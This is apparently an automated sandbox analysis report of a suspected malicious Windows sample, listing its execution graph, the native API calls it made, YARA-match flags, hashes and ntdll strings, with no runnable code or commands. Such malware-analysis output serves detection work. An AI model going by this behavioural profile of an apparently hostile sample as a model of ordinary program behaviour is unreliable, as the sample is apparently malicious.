                                                      execution_graph 95307 42fd23 95308 42fc93 95307->95308 95309 42fcf0 95308->95309 95313 42eb13 95308->95313 95311 42fccd 95316 42ea33 95311->95316 95319 42ccd3 95313->95319 95315 42eb2e 95315->95311 95322 42cd23 95316->95322 95318 42ea4c 95318->95309 95320 42ccf0 95319->95320 95321 42cd01 RtlAllocateHeap 95320->95321 95321->95315 95323 42cd3d 95322->95323 95324 42cd4e RtlFreeHeap 95323->95324 95324->95318 95325 42bfc3 95326 42bfdd 95325->95326 95329 1622df0 LdrInitializeThunk 95326->95329 95327 42c005 95329->95327 95330 428fe3 95331 429048 95330->95331 95332 42907f 95331->95332 95335 4247c3 95331->95335 95334 429061 95337 4247d1 95335->95337 95336 424851 95336->95334 95337->95336 95338 424953 95337->95338 95339 424968 95337->95339 95340 42c9b3 NtClose 95338->95340 95347 42c9b3 95339->95347 95342 42495c 95340->95342 95342->95334 95343 4249a8 95343->95334 95344 424971 95344->95343 95345 42ea33 RtlFreeHeap 95344->95345 95346 42499c 95345->95346 95346->95334 95348 42c9d0 95347->95348 95349 42c9e1 NtClose 95348->95349 95349->95344 95350 424d83 95351 424d9f 95350->95351 95352 424dc7 95351->95352 95353 424ddb 95351->95353 95354 42c9b3 NtClose 95352->95354 95355 42c9b3 NtClose 95353->95355 95356 424dd0 95354->95356 95357 424de4 95355->95357 95360 42eb53 RtlAllocateHeap 95357->95360 95359 424def 95360->95359 95445 425113 95450 42512c 95445->95450 95446 4251bf 95447 425177 95448 42ea33 RtlFreeHeap 95447->95448 95449 425187 95448->95449 95450->95446 95450->95447 95451 4251ba 95450->95451 95452 42ea33 RtlFreeHeap 95451->95452 95452->95446 95453 42fbf3 95454 42fc03 95453->95454 95455 42fc09 95453->95455 95456 42eb13 RtlAllocateHeap 95455->95456 95457 42fc2f 95456->95457 95361 1622b60 LdrInitializeThunk 95458 41b653 95459 41b697 95458->95459 95460 41b6b8 95459->95460 95461 42c9b3 NtClose 95459->95461 95461->95460 95462 414313 95463 41432d 95462->95463 95468 417ad3 95463->95468 95465 41434b 95466 414390 95465->95466 95467 41437f PostThreadMessageW 95465->95467 95467->95466 95470 417af7 95468->95470 95469 417afe 95469->95465 95470->95469 95471 417b4a 95470->95471 95472 417b39 LdrLoadDll 95470->95472 95471->95465 95472->95471 95473 411d33 95474 411d48 95473->95474 95479 414023 95474->95479 95477 42c9b3 NtClose 95478 411d61 95477->95478 95481 414049 95479->95481 95480 411d54 95480->95477 95481->95480 95483 413da3 95481->95483 95484 413dc5 95483->95484 95486 42cc33 95483->95486 95484->95480 95487 42cc50 95486->95487 95490 1622c70 LdrInitializeThunk 95487->95490 95488 42cc78 95488->95484 95490->95488 95491 419098 95492 42c9b3 NtClose 95491->95492 95493 4190a2 95492->95493 95362 401c8f 95363 401c95 95362->95363 95366 4300c3 95363->95366 95369 42e5e3 95366->95369 95370 42e609 95369->95370 95381 4075f3 95370->95381 95372 42e61f 95380 401d1a 95372->95380 95384 41b463 95372->95384 95374 42e63e 95377 42e653 95374->95377 95399 42cd73 95374->95399 95395 428693 95377->95395 95378 42e66d 95379 42cd73 ExitProcess 95378->95379 95379->95380 95383 407600 95381->95383 95402 416793 95381->95402 95383->95372 95385 41b48f 95384->95385 95420 41b353 95385->95420 95388 41b4d4 95390 41b4f0 95388->95390 95393 42c9b3 NtClose 95388->95393 95389 41b4bc 95391 41b4c7 95389->95391 95392 42c9b3 NtClose 95389->95392 95390->95374 95391->95374 95392->95391 95394 41b4e6 95393->95394 95394->95374 95396 4286f5 95395->95396 95398 428702 95396->95398 95431 418943 95396->95431 95398->95378 95400 42cd8d 95399->95400 95401 42cd9e ExitProcess 95400->95401 95401->95377 95403 4167b0 95402->95403 95405 4167c9 95403->95405 95406 42d3c3 95403->95406 95405->95383 95408 42d3dd 95406->95408 95407 42d40c 95407->95405 95408->95407 95413 42c013 95408->95413 95411 42ea33 RtlFreeHeap 95412 42d485 95411->95412 95412->95405 95414 42c030 95413->95414 95417 1622c0a 95414->95417 95415 42c05c 95415->95411 95418 1622c1f LdrInitializeThunk 95417->95418 95419 1622c11 95417->95419 95418->95415 95419->95415 95421 41b36d 95420->95421 95425 41b449 95420->95425 95426 42c0b3 95421->95426 95424 42c9b3 NtClose 95424->95425 95425->95388 95425->95389 95427 42c0d0 95426->95427 95430 16235c0 LdrInitializeThunk 95427->95430 95428 41b43d 95428->95424 95430->95428 95433 41896d 95431->95433 95432 418e7b 95432->95398 95433->95432 95439 413f83 95433->95439 95435 418a9a 95435->95432 95436 42ea33 RtlFreeHeap 95435->95436 95437 418ab2 95436->95437 95437->95432 95438 42cd73 ExitProcess 95437->95438 95438->95432 95443 413fa3 95439->95443 95441 41400c 95441->95435 95442 414002 95442->95435 95443->95441 95444 41b773 RtlFreeHeap LdrInitializeThunk 95443->95444 95444->95442

                                                      Executed Functions

                                                      Function 00417AD3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 84 417ad3-417aef 85 417af7-417afc 84->85 86 417af2 call 42f733 84->86 87 417b02-417b10 call 42fd33 85->87 88 417afe-417b01 85->88 86->85 91 417b20-417b31 call 42e0b3 87->91 92 417b12-417b1d call 42ffd3 87->92 97 417b33-417b47 LdrLoadDll 91->97 98 417b4a-417b4d 91->98 92->91 97->98
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B45
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NU1aAbSmCr.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 417d38369877b74250db912e8e6bb13c15c1812a8033f171d704f8760a4bd8cb
                                                      • Instruction ID: d12cc20611dbccb473ffbd96b21e27a4a6f02d97c40ee013a5ef017d1ba0565a
                                                      • Opcode Fuzzy Hash: 417d38369877b74250db912e8e6bb13c15c1812a8033f171d704f8760a4bd8cb
                                                      • Instruction Fuzzy Hash: F4015EB1E0420DABDB10DAA1DD42FDEB378AB54308F4041AAEA0897240F674EB498B95
                                                      Function 0042C9B3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 105 42c9b3-42c9ef call 404913 call 42dbb3 NtClose
                                                      APIs
                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C9EA
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NU1aAbSmCr.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 4d70b07d015640436ff79a030af5fda1140dbc98913e55b2ed826efc0772edf8
                                                      • Instruction ID: c3916fea0772bbdbc0279c8410de1fff15ffbf804abd9fb5993c11b118a3ee5e
                                                      • Opcode Fuzzy Hash: 4d70b07d015640436ff79a030af5fda1140dbc98913e55b2ed826efc0772edf8
                                                      • Instruction Fuzzy Hash: 61E086716042147BD620FA5ADC02F9B776CDFC5714F40445AFE0867242C7747A0187F4
                                                      Function 01622B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 5eb9814fd03e2a09ce451630871a4541044afca3725e6102394a06c7b8c539b8
                                                      • Instruction ID: 119f454aec3e1f0769b613b9e84411ff55839c1fcea223a15ef3740b23d64b2b
                                                      • Opcode Fuzzy Hash: 5eb9814fd03e2a09ce451630871a4541044afca3725e6102394a06c7b8c539b8
                                                      • Instruction Fuzzy Hash: E490026160240003410575584814657401E97E0201B55C121F5018690EC52589927225
                                                      Function 01622DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7c851b553deff2e51e687cfeb96a88923f544fd0e06972dd9bcb4ebfab49ed86
                                                      • Instruction ID: 49bc0e817323dcb92121d463c592645275d51ac61b7b22abb9bbe65dbf089442
                                                      • Opcode Fuzzy Hash: 7c851b553deff2e51e687cfeb96a88923f544fd0e06972dd9bcb4ebfab49ed86
                                                      • Instruction Fuzzy Hash: 2090023160140413D11175584904747001D97D0241F95C512B4428658ED6568A53B221
                                                      Function 01622C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d5455b5eb3dbf81eda3393412918eb38faed49a39e2ab225edd05a96683f64d9
                                                      • Instruction ID: a5faf4f3e1ada70566cc8fd050fd4045ae70dadfc26c755d57589f6cf05efb5e
                                                      • Opcode Fuzzy Hash: d5455b5eb3dbf81eda3393412918eb38faed49a39e2ab225edd05a96683f64d9
                                                      • Instruction Fuzzy Hash: 2E90023160148802D1107558880478B001997D0301F59C511B8428758EC69589927221
                                                      Function 016235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b390988428a2ba8ea373c9417743876ba929bddfb09a57d115ea201bfda7e2cd
                                                      • Instruction ID: 6b0abfa080f58805b4afb7f003ea9affff3d96b21fa665befba6a9d8f8c98f6a
                                                      • Opcode Fuzzy Hash: b390988428a2ba8ea373c9417743876ba929bddfb09a57d115ea201bfda7e2cd
                                                      • Instruction Fuzzy Hash: 9A900231A0550402D10075584914747101997D0201F65C511B4428668EC7958A5276A2
                                                      Function 0041430F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(41392M9L,00000111,00000000,00000000), ref: 0041438A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NU1aAbSmCr.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 41392M9L$41392M9L
                                                      • API String ID: 1836367815-3081274516
                                                      • Opcode ID: 06fda434b8ccff3761ff56cbb26a12cdefb02e71861326aa55445cdbb95d6234
                                                      • Instruction ID: 42976dbd2dceaa1e0a977a924473439363ed6aa6ab46c42b953b71c348218e9c
                                                      • Opcode Fuzzy Hash: 06fda434b8ccff3761ff56cbb26a12cdefb02e71861326aa55445cdbb95d6234
                                                      • Instruction Fuzzy Hash: 3F0104B2D0021C7ADB01AAE19C82DEFBB7CEF40798F448069FA04A7141D5788F068BB1
                                                      Function 00414313 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(41392M9L,00000111,00000000,00000000), ref: 0041438A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NU1aAbSmCr.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 41392M9L$41392M9L
                                                      • API String ID: 1836367815-3081274516
                                                      • Opcode ID: 639504a2a278ac61002ba711ce2f554ccfa311799b31f556876d0b8b43b30756
                                                      • Instruction ID: 3fa6e5ee1cf9f8121619ab0affa830f4b3690b6f4062a0325252bb4d0d93531c
                                                      • Opcode Fuzzy Hash: 639504a2a278ac61002ba711ce2f554ccfa311799b31f556876d0b8b43b30756
                                                      • Instruction Fuzzy Hash: 8F01D6B2D4121C7ADB11AAE19C82DEFBB7CDF41798F448069FA14A7141D5788F068BB1
                                                      Function 004142DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 31 4142df-4142ff 32 414301 31->32 33 414359-41435c call 425233 31->33 34 414361-41437d 32->34 35 414303-41430a 32->35 33->34 37 41439d-4143a3 34->37 38 41437f-41438e PostThreadMessageW 34->38 38->37 39 414390-41439a 38->39 39->37
                                                      APIs
                                                      • PostThreadMessageW.USER32(41392M9L,00000111,00000000,00000000), ref: 0041438A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NU1aAbSmCr.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 41392M9L$41392M9L
                                                      • API String ID: 1836367815-3081274516
                                                      • Opcode ID: b5455ddb34965fc3d5f9ad89c7ac4ae6f5a50f54c0de38243e1a5172f6207e5a
                                                      • Instruction ID: 735d4efb0f620f6208f1c147f2a007fbd04646f5a27583c5ced9a2cb2e41a2ff
                                                      • Opcode Fuzzy Hash: b5455ddb34965fc3d5f9ad89c7ac4ae6f5a50f54c0de38243e1a5172f6207e5a
                                                      • Instruction Fuzzy Hash: 1001FC72A4115C77CB118E949D829EEBB6CEE81758B44C0EAEE14DB201E7294E0687E2
                                                      Function 0041430B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 40 41430b-41437d 42 41439d-4143a3 40->42 43 41437f-41438e PostThreadMessageW 40->43 43->42 44 414390-41439a 43->44 44->42
                                                      APIs
                                                      • PostThreadMessageW.USER32(41392M9L,00000111,00000000,00000000), ref: 0041438A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NU1aAbSmCr.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 41392M9L$41392M9L
                                                      • API String ID: 1836367815-3081274516
                                                      • Opcode ID: 35b59af5c047f9fb8afd9390d102ded51f0e0ac9b59e256273bac81645503566
                                                      • Instruction ID: ba8821999e5b2222220c20eb37ec5ddfee11338e0595fbe07a32eae1e8a502a6
                                                      • Opcode Fuzzy Hash: 35b59af5c047f9fb8afd9390d102ded51f0e0ac9b59e256273bac81645503566
                                                      • Instruction Fuzzy Hash: 06E08632B4010C759B1186D49C83DFFB77CEE85755B118067EE54A3100D1244D0647A6
                                                      Function 0042CD23 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 45 42cd23-42cd64 call 404913 call 42dbb3 RtlFreeHeap
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CD5F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NU1aAbSmCr.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: $hA
                                                      • API String ID: 3298025750-1828366215
                                                      • Opcode ID: 11a1ee925e275e06544c5406db7f8856123b0f17c84fa89a6084066825a6a8e4
                                                      • Instruction ID: a86032f8d3a2c2e5ac1b48a75f49b08fe8d08fe9d8143af625c64d2ce33d2964
                                                      • Opcode Fuzzy Hash: 11a1ee925e275e06544c5406db7f8856123b0f17c84fa89a6084066825a6a8e4
                                                      • Instruction Fuzzy Hash: 25E092B16042047BD610EE59DC41F9F37ACEFC9750F000019FE08A7241C670BA108BF8
                                                      Function 0042CCD3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 100 42ccd3-42cd17 call 404913 call 42dbb3 RtlAllocateHeap
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,0041E93E,?,?,00000000,?,0041E93E,?,?,?), ref: 0042CD12
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NU1aAbSmCr.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 6d2fd3d9d8fa43bb4c96a5e86d46db2439ffdec3bfb4a8501485fe68fbf598b1
                                                      • Instruction ID: 8ac62094bed881341e935ba2056062aaf7a5c0d313ce0ce43bd6ed86aa1799c4
                                                      • Opcode Fuzzy Hash: 6d2fd3d9d8fa43bb4c96a5e86d46db2439ffdec3bfb4a8501485fe68fbf598b1
                                                      • Instruction Fuzzy Hash: E9E06DB16042187BD610EE59DC41F9B37ADEFC8714F004059F908A7242D7B0BE108AB8
                                                      Function 0042CD73 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 110 42cd73-42cdac call 404913 call 42dbb3 ExitProcess
                                                      APIs
                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,5FB0DE08,?,?,5FB0DE08), ref: 0042CDA7
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NU1aAbSmCr.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: 827962f8e5b6eea344056bc0e8c834f660838af0f0cd76d3b4da636ad4f1341f
                                                      • Instruction ID: 71441ec039304675d8532f3ccb864b1527d6cd1b6168a292b1f3398713e3bfcd
                                                      • Opcode Fuzzy Hash: 827962f8e5b6eea344056bc0e8c834f660838af0f0cd76d3b4da636ad4f1341f
                                                      • Instruction Fuzzy Hash: 7EE04F756006147BD160AA5ADC41FDB77ACDFC5714F40445AFA08A7282C6B47A1186F4
                                                      Function 00417B6A Relevance: 1.5, APIs: 1, Instructions: 15libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 115 417b6a-417b6c 116 417b39-417b47 LdrLoadDll 115->116 117 417b6e 115->117 118 417b4a-417b4d 116->118
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B45
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_NU1aAbSmCr.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: d32d0c987d681beb1f8220a0573b2f2b011218fec3aa742dd90691c8de5758f3
                                                      • Instruction ID: f93e50e1d3076807ff20cbd814b72f48560988693ec6e8ee0dfa18ee3505d4d8
                                                      • Opcode Fuzzy Hash: d32d0c987d681beb1f8220a0573b2f2b011218fec3aa742dd90691c8de5758f3
                                                      • Instruction Fuzzy Hash: 3CD01270A4810A6AD740CA98CC42FA8FBA4DB49209F0402C5F90C9F181D5717984C795
                                                      Function 01622C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 119 1622c0a-1622c0f 120 1622c11-1622c18 119->120 121 1622c1f-1622c26 LdrInitializeThunk 119->121
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 5757b8eeb315fced8404229affb36b42493b773890ecf5f22d5d392d1da97638
                                                      • Instruction ID: 0ecff2aca33659c0c3924ebc81bfa6ca81043a41d1ddbae41014f68c756c0c9a
                                                      • Opcode Fuzzy Hash: 5757b8eeb315fced8404229affb36b42493b773890ecf5f22d5d392d1da97638
                                                      • Instruction Fuzzy Hash: B4B09B71D019D5C5DA51E7644E08717791477D0701F15C165E2034751F4738C1D1F675

                                                      Non-executed Functions

                                                      Function 01662349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2160512332
                                                      • Opcode ID: f623e7b58054c7931f14334ff8ce8173543e31d0e1c54f1e7de31f2169a125d7
                                                      • Instruction ID: 8250cbb38c769c1152cab639821971c4973feb0ac4e95b2fb097ee145ada4182
                                                      • Opcode Fuzzy Hash: f623e7b58054c7931f14334ff8ce8173543e31d0e1c54f1e7de31f2169a125d7
                                                      • Instruction Fuzzy Hash: 8A928C71604342AFE721CE29CC90B6BBBE9BB84754F04492DFA95DB390D770E844CB92
                                                      Function 01618620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Address of the debug info found in the active list., xrefs: 016554AE, 016554FA
                                                      • Critical section address., xrefs: 01655502
                                                      • Invalid debug info address of this critical section, xrefs: 016554B6
                                                      • Thread identifier, xrefs: 0165553A
                                                      • 8, xrefs: 016552E3
                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 01655543
                                                      • double initialized or corrupted critical section, xrefs: 01655508
                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016554E2
                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0165540A, 01655496, 01655519
                                                      • Critical section debug info address, xrefs: 0165541F, 0165552E
                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016554CE
                                                      • corrupted critical section, xrefs: 016554C2
                                                      • undeleted critical section in freed memory, xrefs: 0165542B
                                                      • Critical section address, xrefs: 01655425, 016554BC, 01655534
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                      • API String ID: 0-2368682639
                                                      • Opcode ID: 8b115cffb62d07f2c5d525b77cd8486c02ea06894ff97e578f5f24c8dc5b1445
                                                      • Instruction ID: 454d64714f95e5f71af499e13c1519b3a594014a5269c1a2a38d60f41322fcb8
                                                      • Opcode Fuzzy Hash: 8b115cffb62d07f2c5d525b77cd8486c02ea06894ff97e578f5f24c8dc5b1445
                                                      • Instruction Fuzzy Hash: 2681ACB0A01359EFDB60CF99CC44BAEBBB9BB49B04F14411DF905BB241D3B5A941CB90
                                                      Function 016129F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01652506
                                                      • @, xrefs: 0165259B
                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01652412
                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01652624
                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01652498
                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01652409
                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016525EB
                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 0165261F
                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016522E4
                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016524C0
                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01652602
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                      • API String ID: 0-4009184096
                                                      • Opcode ID: 6ab01f1485abc08f47b2e41210f71233f26d810d12aad5a2dbf0499d5e01d59f
                                                      • Instruction ID: a1b577d40bf9a0c7e8848069b1837d2e9816e8248e3a0c96246fe22db5828813
